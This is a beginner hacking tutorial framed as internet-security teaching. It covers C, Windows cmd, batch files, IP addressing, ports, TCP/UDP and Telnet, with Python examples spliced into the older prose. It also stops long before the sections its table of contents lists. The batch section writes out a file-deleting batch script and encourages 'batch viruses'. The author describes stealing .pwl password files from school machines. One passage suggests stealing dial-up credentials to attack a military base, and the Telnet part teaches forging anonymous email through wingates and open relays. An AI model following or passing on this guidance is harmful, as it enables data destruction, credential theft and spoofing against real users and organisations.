Internet Security For Beginners:

Contents

Introduction
Programming Languages
Command Prompt
Batch Programming
IP Addresses
Port Numbers
TCP And UDP
Telnet FAQ
NetBIOS/SMB Hacking
Structured Query Language
SQL Injection
Trojans
Faking/Hiding Extensions
Obtaining IP Addresses
A Short DoS FAQ
A Short Buffer Overflow FAQ
Using Password Crackers
Proxies And Anonymity
Google Hacking
Index Browsing
Basic NetCat Tutorial
Compiling Exploits
Using Windows FTP
Hacker Community
Basic Security
Hacker Jargon/Slang FAQ
Useful Links
Disclaimer
Greetz And Fuck Off's

INTRODUCTION:

Welcome to Internet Security For Beginners, this is the sequel to my "Hacking For n00bs Version 2". I expanded and improved this version, so much of this text will be from the prequel to this text. This tutorial will teach you how to break into computers in order to teach you how to prevent such attacks from happening; after all, if you know how to attack, you can figure out your own way of defending. Before trying any of the things in this text read the whole thing, otherwise you might get confused. This tutorial is for the complete beginner to Internet Security. I hope you enjoy this text! This text was written by Aelphaeis Mangarae. BY READING THIS YOU'RE AGREEING YOU HAVE READ THE DISCLAIMER AND HAVE AGREED TO EVERYTHING IN IT!

PROGRAMMING LANGUAGES:

So you want to become a hacker? Well obviously, if you're reading this text. To become a hacker you must learn a programming language, so you can code your own programs and learn how a computer works, so you can repair or restore it. Since you're a beginner you don't want to start off with something really hard. One of the most widely used programming languages in the world is C. C was invented by Dennis Ritchie at Bell Telephone Labs in 1972. The language was originally created to write the UNIX operating system, which if you don't already know is a text based operating system, yes that's right NO GUI! Because of how powerful C was, C soon became one of the most used programming languages there is. Nearly all the hackers out there code in C, so to begin with you had best start off with C, but don't think that you can jump straight into coding a GUI. C is not like Visual Basic, where you mostly just click and drag to create a GUI. The first programs you create in C will not have a GUI and will just use the command prompt. So you're going to start coding in C; first you need a compiler, so search Google for LCC-W32. This is a freeware compiler, so you don't need to pay for it nor download a cracked version. Since this is just a beginner's guide to Security I'm not going to go into coding in C, however I will show you how to compile your first program. So download LCC-W32 if you haven't already and open it up. Go to File, New, Project, then enter the name of your project. Below that enter the path where your project will be stored; this will include the .c file and your compiled program. Below that you can put a path where you want your compiled program, however you should notice that when you click in that box it automatically creates a path, and you can use that if you want. Down the bottom you should have it set to "Single User" and Console Application; as I said before you will be making a console application, not a program with a GUI.
Click Create. You should then be prompted for where your .c file should be located and what its file name should be; just enter a file name like example.c and click OK. After that you will be prompted with another screen, click OK on that one as well. On the next screen just click Next again, then on the next one make sure you have it set to Console Application under Type of Output, then click Next, and on the next screen click Next again. You should now have a white window where you can enter the code you're going to compile. Here is the code for your first program:

#include <stdio.h>

int main(void)
{
    printf("Hello World\n");
    return 0;
}

After you have entered the code, go to Compiler then Make, and your program should now be compiled. To execute your program go to Compiler, then Execute example.exe (your program file name may vary). Yay! You have now seen your first C program in action. Now I will explain what each part of the C program does. First we have #include <stdio.h>. This includes the stdio.h header file in your C application; this header file is needed for output to the screen (it is where printf is declared). Below that we have int main(void).

Now int means integer. This allows a return code to be passed to the invoker; in the case of main() the invoker is the operating system (or the shell or batch file that started your program), which sees the value as the program's exit code. It is good programming practice to declare main() as returning an integer, and it is what the C99 Standard requires. You should have noticed int main(void); void means that the function takes no arguments. Obviously in this program main() does not take any arguments, therefore it is good programming practice to write int main(void). Below int main(void) is {. This bracket begins the main() function and } ends the main() function. Now let's look at the body of the program. At the beginning of the main() function we have printf("Hello World\n"); Now printf is one of C's standard library functions; what printf does is print text to the screen. You may notice that "Hello World\n" is in quotation marks; this is so the compiler knows it is not a variable and is in fact a text string that printf needs to print to the screen. When you ran your program you should have noticed it printed: Hello World. You may be thinking, well how come it didn't print \n, what is that for? \n basically means a new line. To play around with \n try compiling and executing the following program:

#include <stdio.h>

int main(void)
{
    printf("H\ne\nl\nl\no\nW\no\nr\nl\nd\n");
    return 0;
}

Ok, now I will explain some things I didn't get around to explaining before. At the end of printf("H\ne\nl\nl\no\nW\no\nr\nl\nd\n") is a semicolon; in C you must put a semicolon on the end of each statement (not including #include lines and the braces of your functions). Below printf is return 0;, which returns 0 to whatever started main(), the operating system in this case, as the program's exit status (0 conventionally means success). With int main() LCC-W32 complains if you leave it out (strictly, C99 lets you omit it from main() and 0 is returned anyway, but older compilers do not). If you really don't want to return anything, some compilers let you change int main() to void main() (meaning it returns nothing), and then you won't need to include return 0;. Be aware that void main() is not standard C; it is accepted by some Windows compilers but may be rejected or warned about elsewhere, so int main(void) with return 0; is the form to get used to. So basically:

#include <stdio.h>

void main(void)
{
    printf("Hello World\n");
}

Now you have compiled your first program I bet you're thinking, well where can I go from here? Well, you need some books on C. I recommend the following books:

A Short Guide On C Programming For Beginners (This is a short guide by Aelphaeis Mangarae.)

Sam's Teach Yourself C In 21 Days

Primers Guide To C Programming

COMMAND PROMPT:

You know what Command Prompt is, right? It's that big black box. If you don't know, try and remember. Command Prompt is the command line interpreter for Windows, and was essential back in the days when operating systems didn't have GUIs. To open up Command Prompt go to "Run" then type in "cmd", without quotation marks of course. Why is it important to learn how to use Command Prompt? Well a lot of hacking, at least hacking using Windows, involves Command Prompt. Type "help" and you should get a list of commands; read all of them. Below I've listed all the commands and their functions:

ASSOC     Displays or modifies file extension associations.
AT        Schedules commands and programs to run on a computer.
ATTRIB    Displays or changes file attributes.
BREAK     Sets or clears extended CTRL+C checking.
CACLS     Displays or modifies access control lists (ACLs) of files.
CALL      Calls one batch program from another.
CD        Displays the name of or changes the current directory.
CHCP      Displays or sets the active code page number.
CHDIR     Displays the name of or changes the current directory.
CHKDSK    Checks a disk and displays a status report.
CHKNTFS   Displays or modifies the checking of disk at boot time.
CLS       Clears the screen.
CMD       Starts a new instance of the Windows command interpreter.
COLOR     Sets the default console foreground and background colors.
COMP      Compares the contents of two files or sets of files.
COMPACT   Displays or alters the compression of files on NTFS partitions.
CONVERT   Converts FAT volumes to NTFS. You cannot convert the current drive.
COPY      Copies one or more files to another location.
DATE      Displays or sets the date.
DEL       Deletes one or more files.
DIR       Displays a list of files and subdirectories in a directory.
DISKCOMP  Compares the contents of two floppy disks.
DISKCOPY  Copies the contents of one floppy disk to another.
DOSKEY    Edits command lines, recalls Windows commands, and creates macros.
ECHO      Displays messages, or turns command echoing on or off.
ENDLOCAL  Ends localization of environment changes in a batch file.
ERASE     Deletes one or more files.
EXIT      Quits the CMD.EXE program (command interpreter).
FC        Compares two files or sets of files, and displays the differences between them.
FIND      Searches for a text string in a file or files.
FINDSTR   Searches for strings in files.
FOR       Runs a specified command for each file in a set of files.
FORMAT    Formats a disk for use with Windows.
FTYPE     Displays or modifies file types used in file extension associations.
GOTO      Directs the Windows command interpreter to a labeled line in a batch program.
GRAFTABL  Enables Windows to display an extended character set in graphics mode.
HELP      Provides Help information for Windows commands.
IF        Performs conditional processing in batch programs.
LABEL     Creates, changes, or deletes the volume label of a disk.
MD        Creates a directory.
MKDIR     Creates a directory.
MODE      Configures a system device.
MORE      Displays output one screen at a time.
MOVE      Moves one or more files from one directory to another directory.
PATH      Displays or sets a search path for executable files.
PAUSE     Suspends processing of a batch file and displays a message.
POPD      Restores the previous value of the current directory saved by PUSHD.
PRINT     Prints a text file.
PROMPT    Changes the Windows command prompt.
PUSHD     Saves the current directory then changes it.
RD        Removes a directory.
RECOVER   Recovers readable information from a bad or defective disk.
REM       Records comments (remarks) in batch files or CONFIG.SYS.
REN       Renames a file or files.
RENAME    Renames a file or files.
REPLACE   Replaces files.
RMDIR     Removes a directory.
SET       Displays, sets, or removes Windows environment variables.
SETLOCAL  Begins localization of environment changes in a batch file.
SHIFT     Shifts the position of replaceable parameters in batch files.
SORT      Sorts input.
START     Starts a separate window to run a specified program or command.
SUBST     Associates a path with a drive letter.
TIME      Displays or sets the system time.
TITLE     Sets the window title for a CMD.EXE session.
TREE      Graphically displays the directory structure of a drive or path.
TYPE      Displays the contents of a text file.
VER       Displays the Windows version.
VERIFY    Tells Windows whether to verify that your files are written correctly to a disk.
VOL       Displays a disk volume label and serial number.
XCOPY     Copies files and directory trees.

After reading all the commands and their functions you should have learnt a whole lot about how Windows works. When using a GUI (Graphical User Interface) you are doing the same file operations these text based commands do, it's just that you don't see what's going on in the background. One cool thing you can do with Command Prompt is view and alter the contents of your Hard Drive. To view the contents of your Hard Drive via CMD you're going to have to use some commands, such as CD, DIR, TREE and DEL. Type "dir" and you should get a list of files on your C:\ Drive, or whatever drive is your default. To move to another folder type "cd foldername", so if we wanted to go to the WINDOWS folder we would type "cd WINDOWS". Now to view a list of files in WINDOWS we type "dir" and it should give us a list of files. If you want to go back to your C:\ then type "cd C:\" (or just "cd \"); make sure to use a backslash. On Windows XP I know you have to use a backslash or else it won't work; I'm not sure what OS you have, but it should be the same thing. You now know how to view the contents of your Hard Drive via cmd, but how do you delete and copy? Well that's easy, just use the copy and del commands. Let's say you have a file on your C:\ Drive called hello.txt; you can do "del C:\hello.txt" and it should delete that file. If you want to copy that file all you have to do is type "copy C:\hello.txt C:\hello2.txt" and that should make a copy of hello.txt on your C:\ Drive called hello2.txt. Try experimenting with other cmd commands; you can learn a lot.

BATCH PROGRAMMING:

The thought on your mind right now is probably, what the hell is batch programming? Well batch programming is basically running a set of Windows commands one after another. Above you learned how to use command prompt, right? Well batch programming uses those commands. To create a batch file all you have to do is open up Notepad and type in some code, e.g.:

echo Hello have a nice day!
del C:\WINDOWS\
del C:\Program Files\
echo I hope you enjoy this!

Then save it as filename.bat. If you choose to execute the file (which would be a bad idea) it will carry out the commands one by one. If you wanted to you could create a "batch virus"; most Anti-Virus software would fail to detect your batch files as a virus, since they are just text. Keep in mind though that batch viruses are stupid, and you should only use them as a last resort, and yes I am aware that you cannot delete the WINDOWS folder while Windows is running. If you're smart you could make some clever batch files; just take a look at all the command prompt commands and think. Just right now I thought of something useful: let's say you want to get the victim's IP Address and you didn't have any way of getting it except via a Trojan, and all the Trojans you have are detected by Anti-Virus and you don't have time to code your own. You just want to get their IP Address; you could put up your firewall or IDS, then make a batch file, and inside it you could put:

@echo off
ping 127.0.0.1

(Replace 127.0.0.1 with your IP Address.) When your victim ran it and pinged you, you could check your firewall log and sure enough you would have their IP Address (assuming their network lets ICMP out and your firewall logs it). Think of some creative stuff you can do with batch. Now that you have acquired some basic batch programming it is time to move on to some batch programming that is a tiny bit more advanced. One of the things I have used batch programming for in the past is stealing .pwl files from the school computers, believe it or not some of my school computers are still , obviously I go to a public school! Anyway, the batch file I used was:

cd C:\WINDOWS\
copy *.pwl H:\

What that does is copy all the .pwl files from the WINDOWS directory to my H:\ drive. Notice I used *.pwl; * is a wildcard, so only the files which have the extension .pwl will be copied to my H:\ drive. (.pwl files are the password list files where Windows 95/98 cached passwords, which is why they are worth grabbing.) Now it's time to try some basic checking and branching (IF, GOTO and labels):

@echo off
IF EXIST C:\example.txt GOTO :Yes
IF NOT EXIST C:\example.txt GOTO :No

:Yes
ECHO The file does exist
GOTO :End

:No
ECHO The file does NOT exist
GOTO :End

:End

Now that we know whether the file exists we can move on to working with it. If you're a C programmer you would know it is always best to include checks like this in your programming, to prevent errors from occurring or to alert the user to the fact an error has occurred.

IP ADDRESSES:

What is an IP Address? For those of you who don't know, IP stands for Internet Protocol; an IP Address is a number assigned to a computer connected to the Internet. Each time you connect to the Internet you are assigned an IP Address, for example: 202.61.175.89. An (IPv4) IP Address always consists of 32 bits, written as four numbers separated by dots; each piece of the IP Address (e.g. 125) is 8 bits and can range from 0 to 255, so the IP Address 267.89.245.287 is an invalid IP Address because two of the numbers it contains are above 255. There are a total of 4,294,967,296 (2 to the power of 32) IP Addresses; of course not all of them are connected to a computer, and some ranges are reserved. You will probably notice that each time you log on to the Internet your IP Address is similar, e.g. you log on as 202.61.175.89 one time, then the next time you log on you're on 202.61.175.187. This is because you're connecting through the same ISP, therefore you will usually get an address from the same IP Range; if you did a scan from 202.61.175.0 to 202.61.175.255 you could almost guarantee all the IP Addresses would belong to the same ISP. This is useful to know, because say if you were planning on hacking Wright Patterson Air Force Base (like Kuji and Data Stream Cowboy did) you could scan an AOL IP Range for a certain service, then when you found a computer with a certain Port open you could exploit it and gain control over that computer, steal the Dial Up Passwords and use them when you're hacking WP AFB. One of the things you may wish to do when hacking is to test a program or exploit on your own computer, so what you would have to do is go into CMD and type "ipconfig" to find your address, right? Wrong: instead of using your IP Address all the time you can use 127.0.0.1. If you type that into a program or whatever you are using to "hack", your computer would understand 127.0.0.1 as your own computer, a.k.a. the localhost.
Although the common IP Address looks something like 125.12.52.1, it is extremely likely that in the future that will change. As you read above, there are not much more than 4 billion IP Addresses on the Internet, which may seem like quite a lot, however it isn't; businesses around the world want their computers connected to the Internet. Historically the allocated space (blocks of IP Addresses) a person or organisation had was divided into Classes, decided by the first number of the address:

Class A: first number 1 to 126. The owner gets everything after the first number, i.e. 125.x.x.x (about 16 million addresses). Altogether the Class A ranges make up half of the IPv4 address space.

Class B: first number 128 to 191. The owner gets the last two numbers, e.g. 130.125.x.x (about 65,000 addresses).

Class C: first number 192 to 223. The owner gets only the last number, e.g. 192.125.125.x (256 addresses).

(Classes have since been replaced by Classless Inter-Domain Routing, where a block is written with a prefix length such as 202.61.175.0/24, but you will still see the old names used.)

The new IP Addresses which will soon become standard are IPv6; you may have heard of them before. Unlike the standard IP Address which is 32 bits, IPv6 addresses are 128 bits! An example of an IPv6 address is: FEDC:BA98:7654:3210:FEDC:BA98:7654:3210 (eight groups of four hexadecimal digits).

Looks pretty damn confusing. When IPv6 becomes standard there will be a hell of a lot of IP Addresses; if you wish to work out the number of IPv6 addresses it is 2 to the power of 128, which is:

About 3.4 x 10 To The Power Of 38 (340,282,366,920,938,463,463,374,607,431,768,211,456)

In other words a hell of a lot. I don't think after IPv6 we will be needing any more IP Addresses, after all the world's population is estimated to stop at 11 Billion (a bit off topic I know.)
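The rules above (four octets of 0 to 255, the classful split by first octet, the size of the IPv4 and IPv6 spaces) are easy to get wrong by hand, so here they are as a small Python script. This is an added example, not code from the original text; it uses only the standard library, and the sample addresses in it are taken from the text or constructed.

```python
"""IPv4 validation, classful classification and address-space arithmetic.

Added example for the IP Addresses section (standard library only).
"""
import ipaddress


def parse_ipv4(text):
    """Return the four octets of a dotted-quad IPv4 address, or None if invalid.

    Each field must be a decimal number from 0 to 255, which is why
    267.89.245.287 is rejected: two of its fields exceed 255.
    """
    parts = text.strip().split(".")
    if len(parts) != 4:
        return None
    octets = []
    for part in parts:
        if not part.isdigit():
            return None
        value = int(part)
        if value > 255:
            return None
        octets.append(value)
    return octets


def classful_class(text):
    """Classify an address by its first octet, the historical classful scheme.

    A: 0-127   (leading bit 0)    network is N.x.x.x     -> half of all IPv4 space
    B: 128-191 (leading bits 10)  network is N.N.x.x
    C: 192-223 (leading bits 110) network is N.N.N.x
    D: 224-239 multicast, E: 240-255 reserved
    """
    octets = parse_ipv4(text)
    if octets is None:
        raise ValueError("not a valid IPv4 address: %r" % text)
    first = octets[0]
    if first < 128:
        return "A"
    if first < 192:
        return "B"
    if first < 224:
        return "C"
    if first < 240:
        return "D"
    return "E"


def classful_network(text):
    """The classful block an A/B/C address belongs to, as an ipaddress network."""
    prefix = {"A": 8, "B": 16, "C": 24}[classful_class(text)]
    return ipaddress.ip_network("%s/%d" % (text, prefix), strict=False)


def same_classful_network(a, b):
    """True when two addresses (e.g. the two ISP addresses in the text) share a block."""
    return classful_network(a) == classful_network(b)


def address_space(version):
    """Number of addresses in IPv4 (2**32) or IPv6 (2**128)."""
    return 2 ** {4: 32, 6: 128}[version]


if __name__ == "__main__":
    for addr in ("202.61.175.89", "267.89.245.287", "127.0.0.1"):
        print(addr, "valid" if parse_ipv4(addr) else "invalid")
    print("class of 202.61.175.89:", classful_class("202.61.175.89"),
          "block:", classful_network("202.61.175.89"))
    print("IPv4 addresses:", address_space(4))
    print("IPv6 addresses: about %.1e" % address_space(6))
    # The example IPv6 address from the text, parsed by the standard library.
    print(ipaddress.ip_address("FEDC:BA98:7654:3210:FEDC:BA98:7654:3210"))
```

Run it directly to see the checks on the text's own addresses; 202.61.175.89 and 202.61.175.187 land in the same /24 block, which is the "same ISP range" observation made above.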

PORT NUMBERS:

You have learned about IP Addresses, but what about Port Numbers? Well there are 65,536 ports (numbered 0 to 65535) on your computer, for TCP and separately for UDP. When a program goes to use the Internet it will communicate through one of these ports. Most server programs have a default port, e.g. KaZaA uses Port 1214; if you're coding a program you can set your program to use any one of the 65,536 ports on your computer. It's important to learn the default ports of certain programs. Why? If you're scanning/have scanned a computer you must know what service is running behind each port; now, most of the time programs run at their default port. I said most of the time, remember, not all the time. Below I will list some services and their default ports:

21 – FTP
23 – Telnet
80 – HTTP/Web Server
135 – RPC
139 – NetBIOS
445 – SMB (Server Message Block)
1025 – Network Black Jack
1214 – KaZaA
3389 – Terminal Services
5000 – Universal Plug and Play

So if you had an exploit program for KaZaA, you would scan the Internet looking for computers with Port 1214 open; sure enough, if you tried to exploit that port it should work, assuming the remote machine isn't patched and the exploit you're using works. Now remember what I said: if something is running at a service's default port it doesn't always mean that it's that service (a banner grab or version scan tells you what is really listening there).

TCP AND UDP:

TCP and UDP are two protocols you will come across when hacking, so I thought I would explain them in this text. TCP is different from UDP in that it is a lot more complex protocol than UDP. When a TCP connection is made, the first thing done is the Client sends a SYN packet; the Server, once it receives the SYN packet, replies to it with a SYN-ACK packet (acknowledging the client's SYN and sending its own SYN); the Client then replies with an ACK packet and the connection is established. This is called the three-way handshake. While data is travelling across a TCP connection the protocol constantly checks that every byte of data arrived: each byte is numbered with a sequence number, the receiver acknowledges what it got, and anything not acknowledged is sent again. UDP is a very simple protocol and a faster one than TCP; it does not check to see if each piece of data arrived, and does not send SYN packets and such like the TCP protocol does. TCP is more commonly used than UDP because it is reliable; however UDP is used sometimes when playing games over the Internet because it's a faster protocol and we all hate lag while playing games over the Internet. UDP is an unreliable protocol to use when programming, although fast. UDP is a connectionless protocol, meaning data can be sent without a connection. You must remember if a program is running at TCP Port 1125 it does NOT mean anything for UDP Port 1125; TCP and UDP port numbers are separate.
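The handshake is easier to follow with the sequence numbers written out, so here is a small in-memory model of the three segments next to a UDP send that has no such exchange. This is an added example, not code from the original text: nothing touches the network, the two endpoints just hand each other dictionaries standing in for SYN, SYN-ACK and ACK, and the initial sequence numbers are chosen for readability (real stacks randomise them).

```python
"""Model of the TCP three-way handshake beside UDP's handshake-free send.

Added example for the TCP and UDP section. Segments are plain dicts; the
sequence/acknowledgement arithmetic is the real one (ack = peer seq + 1,
because the SYN itself consumes one sequence number).
"""
import random


class TcpEndpoint:
    """One side of a TCP connection, tracking state and sequence numbers."""

    def __init__(self, name, isn=None):
        self.name = name
        self.state = "CLOSED"
        # Initial sequence number; real stacks randomise it so it can't be guessed.
        self.isn = random.randrange(2 ** 32) if isn is None else isn
        self.peer_seq = None

    def syn(self):
        # Step 1 (client): announce my ISN.
        self.state = "SYN-SENT"
        return {"flags": "SYN", "seq": self.isn, "ack": None}

    def on_syn(self, seg):
        # Step 2 (server): acknowledge the client's SYN and send my own SYN in the
        # same segment. It is a SYN-ACK, not a bare ACK.
        if self.state != "LISTEN" or seg["flags"] != "SYN":
            raise ValueError("%s: unexpected %s in %s" % (self.name, seg["flags"], self.state))
        self.peer_seq = seg["seq"] + 1
        self.state = "SYN-RECEIVED"
        return {"flags": "SYN-ACK", "seq": self.isn, "ack": self.peer_seq}

    def on_syn_ack(self, seg):
        # Step 3 (client): check the server acknowledged my SYN, then ack its SYN.
        if seg["flags"] != "SYN-ACK" or seg["ack"] != self.isn + 1:
            raise ValueError("%s: bad SYN-ACK %r" % (self.name, seg))
        self.peer_seq = seg["seq"] + 1
        self.state = "ESTABLISHED"
        return {"flags": "ACK", "seq": self.isn + 1, "ack": self.peer_seq}

    def on_ack(self, seg):
        # Only after this third segment does the server consider the connection open.
        if seg["flags"] != "ACK" or seg["ack"] != self.isn + 1:
            raise ValueError("%s: bad ACK %r" % (self.name, seg))
        self.state = "ESTABLISHED"


def tcp_handshake(client_isn=1000, server_isn=5000):
    """Run the three segments; return (transcript, client_state, server_state)."""
    client = TcpEndpoint("client", client_isn)
    server = TcpEndpoint("server", server_isn)
    server.state = "LISTEN"
    transcript = []
    seg1 = client.syn()
    transcript.append(("client->server", seg1))
    seg2 = server.on_syn(seg1)
    transcript.append(("server->client", seg2))
    seg3 = client.on_syn_ack(seg2)
    transcript.append(("client->server", seg3))
    server.on_ack(seg3)
    return transcript, client.state, server.state


def half_open(client_isn=1000, server_isn=5000):
    """SYN and SYN-ACK only: without the final ACK the server is still waiting."""
    client = TcpEndpoint("client", client_isn)
    server = TcpEndpoint("server", server_isn)
    server.state = "LISTEN"
    server.on_syn(client.syn())
    return server.state


def udp_send(payload):
    """UDP: no handshake, no sequence numbers, no state on either side."""
    return {"flags": None, "seq": None, "ack": None, "data": payload}


if __name__ == "__main__":
    transcript, cstate, sstate = tcp_handshake()
    for direction, seg in transcript:
        print("%-15s %-8s seq=%s ack=%s" % (direction, seg["flags"], seg["seq"], seg["ack"]))
    print("client:", cstate, "server:", sstate)
    print("server after SYN only:", half_open())
    print("udp:", udp_send(b"hello"))
```

Note what the transcript shows that the paragraph does not: the server's ack number is the client's ISN plus one, the client's final ACK carries the server's ISN plus one, and the server is not ESTABLISHED until that third segment arrives.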

TELNET FAQ:

So what is Telnet? Well Telnet is a protocol, a protocol that has been used for years.

"The purpose of the Telnet protocol is to provide a fairly general, bi- directional, eight-bit byte oriented communications facility. Its primary goal is to allow a standard method of interfacing terminal devices and terminal-oriented processes to each other. It is envisioned that the protocol may also be used for terminal-terminal communication ("linking") and process-process communication (distributed computation). "

Telnet was made to allow a remote user to log in to a foreign machine so you can work as if you're actually at the console of the machine. Just to make sure you know, Telnet is NOT a hacking tool, although it is a tool that hackers use to assist them. When "telneting" to something it is very important to note that the Telnet protocol does NOT use encryption, so any data you send, passwords included, could be sniffed by anyone on the path. Telnet runs over TCP (normally port 23), and the Telnet client is really just a generic TCP client, which is why it can talk to other plain text services as well. So what exactly can you do with Telnet? Well using Telnet you can connect to various things and control stuff; below is a short list of the stuff you can do with Telnet:

1. Send email.
2. Control an FTP server.
3. Log in to a remote computer and control it via a shell.
4. Play text based games over Telnet.
5. Log in to a server and read certain information, e.g. your email.

Sending anonymous email with Telnet is quite easy and quite convenient. The first thing you would want to do when sending anonymous email is telnet to a few wingates first; wingates are basically telnet proxies (named after the WinGate proxy software, whose misconfigured installs would let anyone connect through them). So where can you find a list of wingates, you ask? You can get some from:

Once you have got a list of public wingates it's time to telnet to them. Open up command prompt and type "telnet" (without quotation marks). The following should be printed to the screen:

Welcome to Microsoft Telnet Client

Escape Character is 'CTRL+]'

Microsoft Telnet>

Ok so now you have got Telnet open, how do you use it? With all command line stuff you can nearly always find out how to use it by typing "/?" or "help". If you type help the following should come up:

Microsoft Telnet> help

Commands may be abbreviated. Supported commands are:

c    - close                  close current connection
d    - display                display operating parameters
o    - open hostname [port]   connect to hostname (default port 23).
q    - quit                   exit telnet
set  - set                    set options (type 'set ?' for a list)
sen  - send                   send strings to server
st   - status                 print status information
u    - unset                  unset options (type 'unset ?' for a list)
?/h  - help                   print help information

Microsoft Telnet>

What you would want to do is open a connection, so in Telnet type: o 127.0.0.1 23, except you would replace 127.0.0.1 with the Wingate IP Address and 23 with the port that the Wingate uses, which generally would be port 23. Once you have successfully connected to a Wingate the following should come up: Wingate> Now you have a wingate in front of you, what would you do next? Well one Wingate isn't enough, you need at least 3, so telnet to another one from the Wingate prompt by doing o 127.0.0.1 23 again (each hop only sees the hop before it, which is the point of chaining). Once you have a chain of Wingates it's time to send mail! First we need an SMTP Server to telnet to; where can we find one? Well first I need to explain something: there are two types of SMTP Server, relaying SMTP servers and non-relaying SMTP servers. If you have a relaying SMTP server (an "open relay") that means that you can send email from any address that you like, to any address. If you have a non-relaying SMTP server that means that you can only send mail to addresses within that server's own domain (or from it, if you log in). Example: mail.aol.com

Is an SMTP server (I think). Obviously this SMTP server is owned by AOL, and the chances are it's not going to be a relaying SMTP server, meaning you could do the following:

From: [email protected] To: [email protected]

However you could not do:

From: [email protected] To: [email protected]

Because both of the domains are not AOL. Even if one of them was AOL it could still be refused: the recipient has to be within AOL for the server to accept the mail without question, and for mail going the other way (from an AOL address out to another domain) the SMTP server would ask you for your AOL username and password. How would you go about looking for relaying SMTP servers? Well the only way I can think of is by scanning the Internet for servers listening on Port 25 (SMTP) and testing whether they accept a recipient outside their own domain. Ok, now let's send some mail, to a Yahoo Address. Open up telnet, and if you want, telnet to some wingates for anonymity, although you don't have to if you just want to try sending mail to a friend using telnet. So you have got telnet open and maybe you have got a few wingates chained, now what? Well you need to connect to an SMTP Server, so type: o mx1.mail.yahoo.com 25 (this is one of Yahoo's SMTP servers). After it's connected the following should come up:

220 mx1.yahoo.com ESMTP Sendmail 8.9.3/8.8.6; Thu, 8 Jul 1999 21:46:04 +0000 (GMT)

Or something similar (220 is the "ready" code; every reply starts with a three digit code, and 2xx means OK). Now what to do next? Type HELO followed by a host name, e.g. HELO myhost (yes HELO, not HELLO), to introduce yourself, and the server answers with a 250 line. Now you need to type the fake address you're going to use:

MAIL FROM:[email protected]

It should respond with: 250 [email protected]... Sender ok. Now we need to type the To address, so we type: RCPT TO: [email protected] And of course we should get the following reply: 250 [email protected]... Recipient ok. Now after setting the TO and FROM addresses you would be wanting to send the email itself, right? So type "DATA" (without quotation marks) and you should get something like the following: 354 Enter mail, end with "." on a line by itself. It is now that you enter the message. The subject is not a separate command; it is a header line that goes at the very top of what you type after DATA, along with any From: and To: headers you want the recipient to see, e.g.:

Subject: Hello There!

Then a blank line, then the body of the email, and finally a line containing nothing but a single "." to tell the server the message is finished. Only then should you get something like the following for a response: 250 CAA15313 Message accepted for delivery.
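To see the whole exchange in one place, including what a non-relaying server does when the recipient is outside its domain and where the Received: header that gives a forged mail away comes from, here is a toy SMTP server and client in Python. This is an added example, not code from the original text. Every host name, IP address and mailbox in it is constructed; the server is an in-memory state machine that only models the envelope commands discussed above (no SMTP AUTH, no real sockets).

```python
"""Toy SMTP server + client replaying the envelope exchange from the text.

Added example for the Telnet FAQ section. The server enforces the command
order (HELO, MAIL FROM, RCPT TO, DATA, "."), applies a relay policy, and
stamps a Received: header naming the connecting host. Relay policy is the
simplified "only accept mail for my own domains" rule; all data is constructed.
"""


def _address(arg):
    """'FROM:<a@b>' or 'TO: a@b' -> 'a@b'."""
    return arg.split(":", 1)[1].strip().strip("<>").lower()


class ToySmtpServer:
    def __init__(self, hostname, local_domains, open_relay=False):
        self.hostname = hostname
        self.local_domains = {d.lower() for d in local_domains}
        self.open_relay = open_relay  # True = relays anything (an "open relay")
        self.delivered = []           # (mail_from, [rcpt_to], message_text)
        self.client_ip = None
        self._reset()

    def _reset(self):
        self.helo, self.mail_from, self.rcpt_to = None, None, []
        self.in_data, self.lines = False, []

    def connect(self, client_ip):
        self.client_ip = client_ip
        return "220 %s ESMTP ready" % self.hostname

    def command(self, line):
        """Reply to one client line (None while message text is being entered)."""
        if self.in_data:
            if line == ".":
                return self._deliver()
            # Receiver side of dot-stuffing: a body line sent as '..x' was '.x'.
            self.lines.append(line[1:] if line.startswith(".") else line)
            return None
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "HELO":
            if not arg:
                return "501 HELO requires a hostname"
            self.helo = arg
            return "250 %s Hello %s [%s]" % (self.hostname, arg, self.client_ip)
        if verb == "MAIL":
            if self.helo is None:
                return "503 send HELO first"
            self.mail_from = _address(arg)
            return "250 %s... Sender ok" % self.mail_from
        if verb == "RCPT":
            if self.mail_from is None:
                return "503 need MAIL FROM first"
            rcpt = _address(arg)
            # A non-relaying server only accepts mail addressed to its own domains.
            if not (self.open_relay or rcpt.rpartition("@")[2] in self.local_domains):
                return "550 relaying denied for %s" % rcpt
            self.rcpt_to.append(rcpt)
            return "250 %s... Recipient ok" % rcpt
        if verb == "DATA":
            if not self.rcpt_to:
                return "503 need RCPT TO first"
            self.in_data = True
            return '354 Enter mail, end with "." on a line by itself'
        return "500 command unrecognized: %s" % verb

    def _deliver(self):
        # The server records where the session really came from; a forger can put
        # fake headers below this line but cannot change it.
        received = "Received: from %s [%s] by %s" % (self.helo, self.client_ip, self.hostname)
        self.delivered.append((self.mail_from, list(self.rcpt_to), "\n".join([received] + self.lines)))
        self._reset()
        return "250 Message accepted for delivery"


def send_message(server, client_ip, helo, mail_from, rcpt_to, headers, body):
    """Drive the server like a person at a telnet prompt; return the replies seen."""
    log = [server.connect(client_ip)]
    for cmd in ("HELO %s" % helo, "MAIL FROM:<%s>" % mail_from, "RCPT TO:<%s>" % rcpt_to):
        log.append(server.command(cmd))
        if not log[-1].startswith("250"):
            return log  # refused: stop here, as with the text's non-relaying server
    log.append(server.command("DATA"))
    # Headers (Subject: included) first, then a blank line, then the body.
    for line in headers + [""] + body:
        server.command("." + line if line.startswith(".") else line)  # dot-stuffing
    log.append(server.command("."))  # the lone dot ends the message
    return log


def origin_host(message):
    """(helo_name, ip) from the Received: header the server stamped on the message."""
    for line in message.splitlines():
        if line.startswith("Received: from "):
            host, _, tail = line[len("Received: from "):].partition(" [")
            return host, tail.partition("]")[0]
    return None
```

Try it against a server created with `ToySmtpServer("mx1.example.test", ["example.test"])`: a message to victim@example.test goes through and its first line is the Received: stamp with the connecting address, while a message from a@other.test to b@third.test stops at a 550 on RCPT TO. Construct it with `open_relay=True` and the same message is accepted, which is exactly what makes an open relay useful for forged mail and why the Received: line is what the recipient should look at.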

